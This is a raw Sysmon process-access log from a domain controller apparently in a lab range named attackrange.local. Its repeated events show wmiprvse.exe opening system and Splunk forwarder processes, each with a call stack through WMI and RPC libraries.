15:59:42.022{7901BC46-5350-6008-1E06-00000000A301}66283184C:\Windows\system32\wbem\wmiprvse.exe{7901BC46-4A99-6008-1401-00000000A301}5960C:\Windows\SystemApps\ShellExperienceHost_cw5n1h2txyewy\ShellExperienceHost.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+57d2|C:\Windows\SYSTEM32\framedynos.dll+b171|C:\Windows\system32\wbem\wmiprvse.exe+b13c|C:\Windows\system32\wbem\wmiprvse.exe+ad6b|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+27b0|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x800000000000000027185Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 15:59:42.022{7901BC46-5350-6008-1E06-00000000A301}66283184C:\Windows\system32\wbem\wmiprvse.exe{7901BC46-4A8C-6008-0601-00000000A301}2500C:\Windows\Explorer.EXE0x1410C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+57d2|C:\Windows\SYSTEM32\framedynos.dll+b171|C:\Windows\system32\wbem\wmiprvse.exe+b13c|C:\Windows\system32\wbem\wmiprvse.exe+ad6b|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+27b0|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x800000000000000027184Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 15:59:42.022{7901BC46-5350-6008-1E06-00000000A301}66283184C:\Windows\system32\wbem\wmiprvse.exe{7901BC46-4A8A-6008-FF00-00000000A301}4808C:\Windows\system32\svchost.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+57d2|C:\Windows\SYSTEM32\framedynos.dll+b171|C:\Windows\system32\wbem\wmiprvse.exe+b13c|C:\Windows\system32\wbem\wmiprvse.exe+ad6b|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+27b0|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x800000000000000027183Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 15:59:42.022{7901BC46-5350-6008-1E06-00000000A301}66283184C:\Windows\system32\wbem\wmiprvse.exe{7901BC46-4A8A-6008-FC00-00000000A301}5008C:\Windows\System32\rdpclip.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+57d2|C:\Windows\SYSTEM32\framedynos.dll+b171|C:\Windows\system32\wbem\wmiprvse.exe+b13c|C:\Windows\system32\wbem\wmiprvse.exe+ad6b|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+27b0|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x800000000000000027182Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 15:59:42.022{7901BC46-5350-6008-1E06-00000000A301}66283184C:\Windows\system32\wbem\wmiprvse.exe{7901BC46-4A88-6008-F600-00000000A301}1548C:\Windows\system32\dwm.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+57d2|C:\Windows\SYSTEM32\framedynos.dll+b171|C:\Windows\system32\wbem\wmiprvse.exe+b13c|C:\Windows\system32\wbem\wmiprvse.exe+ad6b|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+27b0|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x800000000000000027181Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 15:59:42.006{7901BC46-5350-6008-1E06-00000000A301}66283184C:\Windows\system32\wbem\wmiprvse.exe{7901BC46-4A88-6008-F300-00000000A301}4180C:\Windows\system32\winlogon.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+57d2|C:\Windows\SYSTEM32\framedynos.dll+b171|C:\Windows\system32\wbem\wmiprvse.exe+b13c|C:\Windows\system32\wbem\wmiprvse.exe+ad6b|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+27b0|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x800000000000000027180Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 15:59:42.006{7901BC46-5350-6008-1E06-00000000A301}66283184C:\Windows\system32\wbem\wmiprvse.exe{7901BC46-4A27-6008-E400-00000000A301}2860C:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+57d2|C:\Windows\SYSTEM32\framedynos.dll+b171|C:\Windows\system32\wbem\wmiprvse.exe+b13c|C:\Windows\system32\wbem\wmiprvse.exe+ad6b|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+27b0|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x800000000000000027179Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 15:59:42.006{7901BC46-5350-6008-1E06-00000000A301}66283184C:\Windows\system32\wbem\wmiprvse.exe{7901BC46-4A22-6008-DB00-00000000A301}4244C:\Program Files\SplunkUniversalForwarder\etc\apps\Splunk_TA_stream\windows_x86_64\bin\streamfwd.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+57d2|C:\Windows\SYSTEM32\framedynos.dll+b171|C:\Windows\system32\wbem\wmiprvse.exe+b13c|C:\Windows\system32\wbem\wmiprvse.exe+ad6b|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+27b0|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x800000000000000027178Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 15:59:42.006{7901BC46-5350-6008-1E06-00000000A301}66283184C:\Windows\system32\wbem\wmiprvse.exe{7901BC46-4A1A-6008-B100-00000000A301}2640C:\Windows\system32\conhost.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+57d2|C:\Windows\SYSTEM32\framedynos.dll+b171|C:\Windows\system32\wbem\wmiprvse.exe+b13c|C:\Windows\system32\wbem\wmiprvse.exe+ad6b|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+27b0|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x800000000000000027177Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 15:59:42.006{7901BC46-5350-6008-1E06-00000000A301}66283184C:\Windows\system32\wbem\wmiprvse.exe{7901BC46-4A19-6008-AD00-00000000A301}4236C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+57d2|C:\Windows\SYSTEM32\framedynos.dll+b171|C:\Windows\system32\wbem\wmiprvse.exe+b13c|C:\Windows\system32\wbem\wmiprvse.exe+ad6b|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+27b0|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x800000000000000027176Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 15:59:42.006{7901BC46-5350-6008-1E06-00000000A301}66283184C:\Windows\system32\wbem\wmiprvse.exe{7901BC46-4A11-6008-9600-00000000A301}4612C:\Windows\System32\msdtc.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+57d2|C:\Windows\SYSTEM32\framedynos.dll+b171|C:\Windows\system32\wbem\wmiprvse.exe+b13c|C:\Windows\system32\wbem\wmiprvse.exe+ad6b|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+27b0|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x800000000000000027175Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 15:59:42.006{7901BC46-5350-6008-1E06-00000000A301}66283184C:\Windows\system32\wbem\wmiprvse.exe{7901BC46-49BC-6008-8200-00000000A301}4876C:\Windows\system32\conhost.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+57d2|C:\Windows\SYSTEM32\framedynos.dll+b171|C:\Windows\system32\wbem\wmiprvse.exe+b13c|C:\Windows\system32\wbem\wmiprvse.exe+ad6b|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+27b0|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x800000000000000027174Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 15:59:42.006{7901BC46-5350-6008-1E06-00000000A301}66283184C:\Windows\system32\wbem\wmiprvse.exe{7901BC46-49BC-6008-8100-00000000A301}4864C:\Windows\system32\WinrsHost.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+57d2|C:\Windows\SYSTEM32\framedynos.dll+b171|C:\Windows\system32\wbem\wmiprvse.exe+b13c|C:\Windows\system32\wbem\wmiprvse.exe+ad6b|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+27b0|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x800000000000000027173Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 15:59:42.006{7901BC46-5350-6008-1E06-00000000A301}66283184C:\Windows\system32\wbem\wmiprvse.exe{7901BC46-49AF-6008-7F00-00000000A301}4328C:\Windows\system32\conhost.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+57d2|C:\Windows\SYSTEM32\framedynos.dll+b171|C:\Windows\system32\wbem\wmiprvse.exe+b13c|C:\Windows\system32\wbem\wmiprvse.exe+ad6b|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+27b0|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x800000000000000027172Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 15:59:42.006{7901BC46-5350-6008-1E06-00000000A301}66283184C:\Windows\system32\wbem\wmiprvse.exe{7901BC46-49AF-6008-7E00-00000000A301}4316C:\Windows\system32\WinrsHost.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+57d2|C:\Windows\SYSTEM32\framedynos.dll+b171|C:\Windows\system32\wbem\wmiprvse.exe+b13c|C:\Windows\system32\wbem\wmiprvse.exe+ad6b|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+27b0|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x800000000000000027171Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 15:59:42.006{7901BC46-5350-6008-1E06-00000000A301}66283184C:\Windows\system32\wbem\wmiprvse.exe{7901BC46-499C-6008-5500-00000000A301}3796C:\Windows\system32\conhost.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+57d2|C:\Windows\SYSTEM32\framedynos.dll+b171|C:\Windows\system32\wbem\wmiprvse.exe+b13c|C:\Windows\system32\wbem\wmiprvse.exe+ad6b|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+27b0|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x800000000000000027170Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 15:59:42.006{7901BC46-5350-6008-1E06-00000000A301}66283184C:\Windows\system32\wbem\wmiprvse.exe{7901BC46-499B-6008-5100-00000000A301}3588C:\Program Files\Amazon\SSM\ssm-agent-worker.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+57d2|C:\Windows\SYSTEM32\framedynos.dll+b171|C:\Windows\system32\wbem\wmiprvse.exe+b13c|C:\Windows\system32\wbem\wmiprvse.exe+ad6b|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+27b0|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x800000000000000027169Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 15:59:42.006{7901BC46-5350-6008-1E06-00000000A301}66283184C:\Windows\system32\wbem\wmiprvse.exe{7901BC46-4997-6008-3600-00000000A301}3468C:\Windows\System32\vds.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+57d2|C:\Windows\SYSTEM32\framedynos.dll+b171|C:\Windows\system32\wbem\wmiprvse.exe+b13c|C:\Windows\system32\wbem\wmiprvse.exe+ad6b|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+27b0|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x800000000000000027168Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 15:59:42.006{7901BC46-5350-6008-1E06-00000000A301}66283184C:\Windows\system32\wbem\wmiprvse.exe{7901BC46-4997-6008-3400-00000000A301}3124C:\Windows\system32\wbem\unsecapp.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+57d2|C:\Windows\SYSTEM32\framedynos.dll+b171|C:\Windows\system32\wbem\wmiprvse.exe+b13c|C:\Windows\system32\wbem\wmiprvse.exe+ad6b|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+27b0|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x800000000000000027167Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 15:59:42.006{7901BC46-5350-6008-1E06-00000000A301}66283184C:\Windows\system32\wbem\wmiprvse.exe{7901BC46-4997-6008-3300-00000000A301}2260C:\Windows\system32\DFSRs.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+57d2|C:\Windows\SYSTEM32\framedynos.dll+b171|C:\Windows\system32\wbem\wmiprvse.exe+b13c|C:\Windows\system32\wbem\wmiprvse.exe+ad6b|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+27b0|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x800000000000000027166Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 